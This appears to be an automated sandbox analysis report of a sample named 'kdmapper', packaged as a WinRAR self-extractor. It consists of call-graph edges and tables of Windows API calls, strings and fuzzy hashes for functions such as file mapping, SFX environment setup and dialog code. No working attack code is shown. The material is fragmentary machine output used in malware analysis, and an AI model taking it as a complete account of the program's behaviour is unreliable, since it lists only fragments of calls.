24824->24750 24826 642a6f 24827 642a7a 24826->24827 24847 643b43 DeleteCriticalSection 24826->24847 24827->24750 24876 64c05a 24829->24876 24832 642a7d 7 API calls 2 library calls 24832->24755 24834 643b10 24833->24834 24836 643b39 24834->24836 24838 642a63 24834->24838 24848 643d46 24834->24848 24853 643b43 DeleteCriticalSection 24836->24853 24838->24824 24839 642b8c 24838->24839 24869 643c57 24839->24869 24843 642baf 24844 642bbc 24843->24844 24875 642bbf 6 API calls ___vcrt_FlsFree 24843->24875 24844->24826 24846 642ba1 24846->24826 24847->24824 24854 643c0d 24848->24854 24851 643d7e InitializeCriticalSectionAndSpinCount 24852 643d69 24851->24852 24852->24834 24853->24838 24855 643c26 24854->24855 24856 643c4f 24854->24856 24855->24856 24861 643b72 24855->24861 24856->24851 24856->24852 24859 643c3b GetProcAddress 24859->24856 24860 643c49 24859->24860 24860->24856 24867 643b7e ___vcrt_FlsSetValue 24861->24867 24862 643bf3 24862->24856 24862->24859 24863 643b95 LoadLibraryExW 24864 643bb3 GetLastError 24863->24864 24865 643bfa 24863->24865 24864->24867 24865->24862 24866 643c02 FreeLibrary 24865->24866 24866->24862 24867->24862 24867->24863 24868 643bd5 LoadLibraryExW 24867->24868 24868->24865 24868->24867 24870 643c0d ___vcrt_FlsSetValue 5 API calls 24869->24870 24871 643c71 24870->24871 24872 643c8a TlsAlloc 24871->24872 24873 642b96 24871->24873 24873->24846 24874 643d08 6 API calls ___vcrt_FlsSetValue 24873->24874 24874->24843 24875->24846 24879 64c073 24876->24879 24877 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24878 63eefe 24877->24878 24878->24753 24878->24832 24879->24877 24881 63ec50 24880->24881 24882 63086d GetModuleHandleW 24881->24882 24883 6308e7 24882->24883 24884 630888 GetProcAddress 24882->24884 24887 630c14 GetModuleFileNameW 24883->24887 24985 6475fb 42 API calls __vsnwprintf_l 24883->24985 24885 6308a1 24884->24885 24886 6308b9 GetProcAddress 24884->24886 24885->24886 24889 6308cb 24886->24889 24896 630c32 24887->24896 24889->24883 24890 630b54 24890->24887 24891 630b5f GetModuleFileNameW CreateFileW 24890->24891 24892 630c08 CloseHandle 24891->24892 24893 630b8f SetFilePointer 24891->24893 24892->24887 24893->24892 24894 630b9d ReadFile 24893->24894 24894->24892 24898 630bbb 24894->24898 24899 630c94 GetFileAttributesW 24896->24899 24901 630c5d CompareStringW 24896->24901 24902 630cac 24896->24902 24976 62b146 24896->24976 24979 63081b 24896->24979 24898->24892 24900 63081b 2 API calls 24898->24900 24899->24896 24899->24902 24900->24898 24901->24896 24903 630cb7 24902->24903 24906 630cec 24902->24906 24905 630cd0 GetFileAttributesW 24903->24905 24907 630ce8 24903->24907 24904 630dfb 24928 63a64d GetCurrentDirectoryW 24904->24928 24905->24903 24905->24907 24906->24904 24908 62b146 GetVersionExW 24906->24908 24907->24906 24909 630d06 24908->24909 24910 630d73 24909->24910 24911 630d0d 24909->24911 24912 624092 _swprintf 51 API calls 24910->24912 24913 63081b 2 API calls 24911->24913 24914 630d9b AllocConsole 24912->24914 24915 630d17 24913->24915 24917 630df3 ExitProcess 24914->24917 24918 630da8 GetCurrentProcessId AttachConsole 24914->24918 24916 63081b 2 API calls 24915->24916 24919 630d21 24916->24919 24986 643e13 24918->24986 24921 62e617 53 API calls 24919->24921 24923 630d3c 24921->24923 24922 630dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24922->24917 24924 624092 _swprintf 51 API calls 24923->24924 24925 630d4f 24924->24925 24926 62e617 53 API calls 24925->24926 24927 630d5e 24926->24927 24927->24917 24928->24770 24930 63081b 2 API calls 24929->24930 24931 63ac2a OleInitialize 24930->24931 24932 63ac4d GdiplusStartup SHGetMalloc 24931->24932 24932->24772 24934 63c5ce 24933->24934 24935 631fac CharUpperW 24934->24935 24936 63c6e4 24934->24936 24988 62f3fa 82 API calls 2 library calls 24934->24988 24935->24934 24936->24781 24936->24782 24939 63ec50 24938->24939 24940 63dbeb SetEnvironmentVariableW 24939->24940 24942 63dc0e 24940->24942 24941 63dc36 24941->24774 24942->24941 24943 63dc2a SetEnvironmentVariableW 24942->24943 24943->24941 24945 63b70b GetObjectW 24944->24945 24946 63b6fe 24944->24946 24948 63b71a 24945->24948 24989 63a6c2 FindResourceW 24946->24989 24950 63a5c6 4 API calls 24948->24950 24952 63b72d 24950->24952 24951 63b770 24963 62da42 24951->24963 24952->24951 24953 63b74c 24952->24953 24954 63a6c2 12 API calls 24952->24954 25003 63a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24953->25003 24957 63b73d 24954->24957 24956 63b754 25004 63a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24956->25004 24957->24953 24959 63b743 DeleteObject 24957->24959 24959->24953 24960 63b75d 25005 63a80c 8 API calls 24960->25005 24962 63b764 DeleteObject 24962->24951 25014 62da67 24963->25014 24968 6390b7 24969 63eb38 8 API calls 24968->24969 24970 6390d6 24969->24970 24970->24794 24972 63acab GdiplusShutdown CoUninitialize 24971->24972 24972->24810 24974->24801 24975->24808 24977 62b196 24976->24977 24978 62b15a GetVersionExW 24976->24978 24977->24896 24978->24977 24980 63ec50 24979->24980 24981 630828 GetSystemDirectoryW 24980->24981 24982 630840 24981->24982 24983 63085e 24981->24983 24984 630851 LoadLibraryW 24982->24984 24983->24896 24984->24983 24985->24890 24987 643e1b 24986->24987 24987->24922 24987->24987 24988->24934 24990 63a6e5 SizeofResource 24989->24990 24991 63a7d3 24989->24991 24990->24991 24992 63a6fc LoadResource 24990->24992 24991->24945 24991->24948 24992->24991 24993 63a711 LockResource 24992->24993 24993->24991 24994 63a722 GlobalAlloc 24993->24994 24994->24991 24995 63a73d GlobalLock 24994->24995 24996 63a7cc GlobalFree 24995->24996 24997 63a74c __InternalCxxFrameHandler 24995->24997 24996->24991 24998 63a7c5 GlobalUnlock 24997->24998 25006 63a626 GdipAlloc 24997->25006 24998->24996 25001 63a7b0 25001->24998 25002 63a79a GdipCreateHBITMAPFromBitmap 25002->25001 25003->24956 25004->24960 25005->24962 25007 63a645 25006->25007 25008 63a638 25006->25008 25007->24998 25007->25001 25007->25002 25010 63a3b9 25008->25010 25011 63a3e1 GdipCreateBitmapFromStream 25010->25011 25012 63a3da GdipCreateBitmapFromStreamICM 25010->25012 25013 63a3e6 25011->25013 25012->25013 25013->25007 25015 62da75 _wcschr __EH_prolog 25014->25015 25016 62daa4 GetModuleFileNameW 25015->25016 25017 62dad5 25015->25017 25018 62dabe 25016->25018 25060 6298e0 25017->25060 25018->25017 25020 62959a 80 API calls 25023 62da4e 25020->25023 25021 62db31 25071 646310 25021->25071 25022 62e261 78 API calls 25025 62db05 25022->25025 25058 62e29e GetModuleHandleW FindResourceW 25023->25058 25025->25021 25025->25022 25039 62dd4a 25025->25039 25026 62db44 25027 646310 26 API calls 25026->25027 25035 62db56 ___vcrt_FlsSetValue 25027->25035 25028 62dc85 25028->25039 25091 629d70 81 API calls 25028->25091 25030 629e80 79 API calls 25030->25035 25032 62dc9f ___std_exception_copy 25033 629bd0 82 API calls 25032->25033 25032->25039 25036 62dcc8 ___std_exception_copy 25033->25036 25035->25028 25035->25030 25035->25039 25085 629bd0 25035->25085 25090 629d70 81 API calls 25035->25090 25038 62dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25036->25038 25036->25039 25092 631b84 MultiByteToWideChar 25036->25092 25038->25039 25040 62e159 25038->25040 25054 631da7 WideCharToMultiByte 25038->25054 25093 62e5b1 50 API calls __vsnprintf 25038->25093 25094 646159 26 API calls 3 library calls 25038->25094 25095 648cce 26 API calls 2 library calls 25038->25095 25096 647625 26 API calls 2 library calls 25038->25096 25097 62e27c 78 API calls 25038->25097 25039->25020 25042 62e1de 25040->25042 25098 648cce 26 API calls 2 library calls 25040->25098 25045 62e214 25042->25045 25049 62e261 78 API calls 25042->25049 25043 62e16e 25099 647625 26 API calls 2 library calls 25043->25099 25050 646310 26 API calls 25045->25050 25047 62e1c6 25100 62e27c 78 API calls 25047->25100 25049->25042 25051 62e22d 25050->25051 25052 646310 26 API calls 25051->25052 25052->25039 25054->25038 25059 62da55 25058->25059 25059->24968 25061 6298ea 25060->25061 25062 62994b CreateFileW 25061->25062 25063 62996c GetLastError 25062->25063 25066 6299bb 25062->25066 25064 62bb03 GetCurrentDirectoryW 25063->25064 25065 62998c 25064->25065 25065->25066 25068 629990 CreateFileW GetLastError 25065->25068 25067 6299ff 25066->25067 25069 6299e5 SetFileTime 25066->25069 25067->25025 25068->25066 25070 6299b5 25068->25070 25069->25067 25070->25066 25072 646349 25071->25072 25073 64634d 25072->25073 25084 646375 25072->25084 25101 6491a8 20 API calls _abort 25073->25101 25075 646352 25102 649087 26 API calls __cftof 25075->25102 25076 646699 25078 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25076->25078 25080 6466a6 25078->25080 25079 64635d 25081 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25079->25081 25080->25026 25083 646369 25081->25083 25083->25026 25084->25076 25103 646230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25084->25103 25086 629bdc 25085->25086 25088 629be3 25085->25088 25086->25035 25088->25086 25089 629785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25088->25089 25104 626d1a 77 API calls 25088->25104 25089->25088 25090->25035 25091->25032 25092->25038 25093->25038 25094->25038 25095->25038 25096->25038 25097->25038 25098->25043 25099->25047 25100->25042 25101->25075 25102->25079 25103->25084 25104->25088 25106 647ce1 _abort 25105->25106 25107 647ce8 25106->25107 25108 647cfa 25106->25108 25141 647e2f GetModuleHandleW 25107->25141 25129 64ac31 EnterCriticalSection 25108->25129 25111 647ced 25111->25108 25142 647e73 GetModuleHandleExW 25111->25142 25116 647dbc 25133 647dee 25116->25133 25117 647de8 25151 652390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25117->25151 25118 647d01 25125 647d76 25118->25125 25128 647d9f 25118->25128 25150 6487e0 20 API calls _abort 25118->25150 25122 648a91 _abort 5 API calls 25127 647d8e 25122->25127 25123 648a91 _abort 5 API calls 25123->25128 25125->25122 25125->25127 25127->25123 25130 647ddf 25128->25130 25129->25118 25152 64ac81 LeaveCriticalSection 25130->25152 25132 647db8 25132->25116 25132->25117 25153 64b076 25133->25153 25136 647e1c 25138 647e73 _abort 8 API calls 25136->25138 25137 647dfc GetPEB 25137->25136 25139 647e0c GetCurrentProcess TerminateProcess 25137->25139 25140 647e24 ExitProcess 25138->25140 25139->25136 25141->25111 25143 647ec0 25142->25143 25144 647e9d GetProcAddress 25142->25144 25146 647ec6 FreeLibrary 25143->25146 25147 647ecf 25143->25147 25145 647eb2 25144->25145 25145->25143 25146->25147 25148 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25147->25148 25149 647cf9 25148->25149 25149->25108 25150->25125 25152->25132 25154 64b09b 25153->25154 25158 64b091 25153->25158 25155 64ac98 _abort 5 API calls 25154->25155 25155->25158 25156 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25157 647df8 25156->25157 25157->25136 25157->25137 25158->25156 25390 63b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25392 64b1b8 27 API calls 3 library calls 25393 631bbd GetCPInfo IsDBCSLeadByte 25395 639580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25348 63c793 102 API calls 5 library calls 25350 63c793 97 API calls 4 library calls 25398 63b18d 78 API calls

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00630863: GetModuleHandleW.KERNEL32(kernel32), ref: 0063087C
                                                                                                                                                                            • Part of subcall function 00630863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0063088E
                                                                                                                                                                            • Part of subcall function 00630863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006308BF
                                                                                                                                                                            • Part of subcall function 0063A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0063A655
                                                                                                                                                                            • Part of subcall function 0063AC16: OleInitialize.OLE32(00000000), ref: 0063AC2F
                                                                                                                                                                            • Part of subcall function 0063AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0063AC66
                                                                                                                                                                            • Part of subcall function 0063AC16: SHGetMalloc.SHELL32(00668438), ref: 0063AC70
                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 0063DF5C
                                                                                                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0063DF83
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0063DF94
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0063DFCE
                                                                                                                                                                            • Part of subcall function 0063DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0063DBF4
                                                                                                                                                                            • Part of subcall function 0063DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0063DC30
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0063DFD7
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,0067EC90,00000800), ref: 0063DFF2
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,0067EC90), ref: 0063DFFE
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0063E009
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063E048
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0063E05A
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0063E061
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000064), ref: 0063E078
                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0063E0C9
                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 0063E0F7
                                                                                                                                                                          • DeleteObject.GDI32 ref: 0063E130
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0063E140
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0063E183
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzg
                                                                                                                                                                          • API String ID: 3049964643-2648067116
                                                                                                                                                                          • Opcode ID: dea5fc19d53d06d1a404d6e6c33e4eafc0c473cb312d55222eba7e20ca53b89b
                                                                                                                                                                          • Instruction ID: 3ac94f266f19bc171eb85e66f9d76485c38fdf453ce760739d8d8d58f9f83202
                                                                                                                                                                          • Opcode Fuzzy Hash: dea5fc19d53d06d1a404d6e6c33e4eafc0c473cb312d55222eba7e20ca53b89b
                                                                                                                                                                          • Instruction Fuzzy Hash: EC61F171904315AFD320AFB0EC49E6B3BEBEB45B45F00142DF945923A1DFB49944CBA2

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 801 63a6c2-63a6df FindResourceW 802 63a6e5-63a6f6 SizeofResource 801->802 803 63a7db 801->803 802->803 805 63a6fc-63a70b LoadResource 802->805 804 63a7dd-63a7e1 803->804 805->803 806 63a711-63a71c LockResource 805->806 806->803 807 63a722-63a737 GlobalAlloc 806->807 808 63a7d3-63a7d9 807->808 809 63a73d-63a746 GlobalLock 807->809 808->804 810 63a7cc-63a7cd GlobalFree 809->810 811 63a74c-63a76a call 640320 809->811 810->808 815 63a7c5-63a7c6 GlobalUnlock 811->815 816 63a76c-63a78e call 63a626 811->816 815->810 816->815 821 63a790-63a798 816->821 822 63a7b3-63a7c1 821->822 823 63a79a-63a7ae GdipCreateHBITMAPFromBitmap 821->823 822->815 823->822 824 63a7b0 823->824 824->822
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0063B73D,00000066), ref: 0063A6D5
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A6EC
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A703
                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A712
                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0063B73D,00000066), ref: 0063A72D
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0063A73E
                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0063A762
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0063A7C6
                                                                                                                                                                            • Part of subcall function 0063A626: GdipAlloc.GDIPLUS(00000010), ref: 0063A62C
                                                                                                                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0063A7A7
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0063A7CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                          • String ID: F0wnc$PNG
                                                                                                                                                                          • API String ID: 211097158-4205786495
                                                                                                                                                                          • Opcode ID: 5c10b15c90fb94a558ab2e203317788206cfb94373d44b09b789960915f2f0ac
                                                                                                                                                                          • Instruction ID: ee7c7b5c874d0f1d5ffe6eb0b81d6eeea53d46bff411096caebf2c87912a3c52
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c10b15c90fb94a558ab2e203317788206cfb94373d44b09b789960915f2f0ac
                                                                                                                                                                          • Instruction Fuzzy Hash: A931E279600712AFC7219F71EC88D5BBBBBEF85B91F040518F84682320EB31DD40EAA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1026 62a69b-62a6bf call 63ec50 1029 62a6c1-62a6ce FindFirstFileW 1026->1029 1030 62a727-62a730 FindNextFileW 1026->1030 1031 62a742-62a7ff call 630602 call 62c310 call 6315da * 3 1029->1031 1033 62a6d0-62a6e2 call 62bb03 1029->1033 1030->1031 1032 62a732-62a740 GetLastError 1030->1032 1037 62a804-62a811 1031->1037 1034 62a719-62a722 1032->1034 1041 62a6e4-62a6fc FindFirstFileW 1033->1041 1042 62a6fe-62a707 GetLastError 1033->1042 1034->1037 1041->1031 1041->1042 1044 62a717 1042->1044 1045 62a709-62a70c 1042->1045 1044->1034 1045->1044 1047 62a70e-62a711 1045->1047 1047->1044 1049 62a713-62a715 1047->1049 1049->1034
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6C4
                                                                                                                                                                            • Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6F2
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6FE
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A728
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,0062A592,000000FF,?,?), ref: 0062A734
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 42610566-0
                                                                                                                                                                          • Opcode ID: 490c5b878ae7ff37d88e4cd9bd5798ce2206529ebbad8ab1d3973b15d301d8db
                                                                                                                                                                          • Instruction ID: 3581be98821fe446f1820e2dfbc4d89f17c8872db530880176fe61e45a8a8eaf
                                                                                                                                                                          • Opcode Fuzzy Hash: 490c5b878ae7ff37d88e4cd9bd5798ce2206529ebbad8ab1d3973b15d301d8db
                                                                                                                                                                          • Instruction Fuzzy Hash: 5141B276500625ABCB25DFA8DC84AEAF3BAFF48350F00419AE55EE3240D7746E90CF94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002,00000000), ref: 00647E0F
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002,00000000), ref: 00647E16
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00647E28
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 76b34a20b511d534062522bc462ab5831a8f4d6583a834fbb9bc0b6d6b97e2a8
                                                                                                                                                                          • Instruction ID: 051c2532f58269f2c48c7d5f500ac406ac61befb70a47ca7d4481d5231a99333
                                                                                                                                                                          • Opcode Fuzzy Hash: 76b34a20b511d534062522bc462ab5831a8f4d6583a834fbb9bc0b6d6b97e2a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 07E04631000348ABCF12BF20CD09A8A3F6BEB00B82F004458F8098B232CB36DE52CA84
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: e4c357169e4a79ce77e3149292a8bace4a8c0dcccac469c69af62e211cd89394
                                                                                                                                                                          • Instruction ID: d361c968cb6fbaef0f75be374a5a9f9640d6757e14a13d778e6b0622297a08bf
                                                                                                                                                                          • Opcode Fuzzy Hash: e4c357169e4a79ce77e3149292a8bace4a8c0dcccac469c69af62e211cd89394
                                                                                                                                                                          • Instruction Fuzzy Hash: 45822C70905A65AEDF15DF64DC91BFAB7BBAF05300F0841B9E8499B342CB315A89CF60
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0063B7E5
                                                                                                                                                                            • Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
                                                                                                                                                                            • Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063B8D1
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B8EF
                                                                                                                                                                          • IsDialogMessageW.USER32(?,?), ref: 0063B902
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0063B910
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0063B91A
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0063B93D
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0063B960
                                                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 0063B983
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0063B99E
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,006535F4), ref: 0063B9B1
                                                                                                                                                                            • Part of subcall function 0063D453: _wcschr.LIBVCRUNTIME ref: 0063D45C
                                                                                                                                                                            • Part of subcall function 0063D453: _wcslen.LIBCMT ref: 0063D47D
                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0063B9B8
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063BA24
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                            • Part of subcall function 0063D4D4: GetDlgItem.USER32(00000068,0067FCB8), ref: 0063D4E8
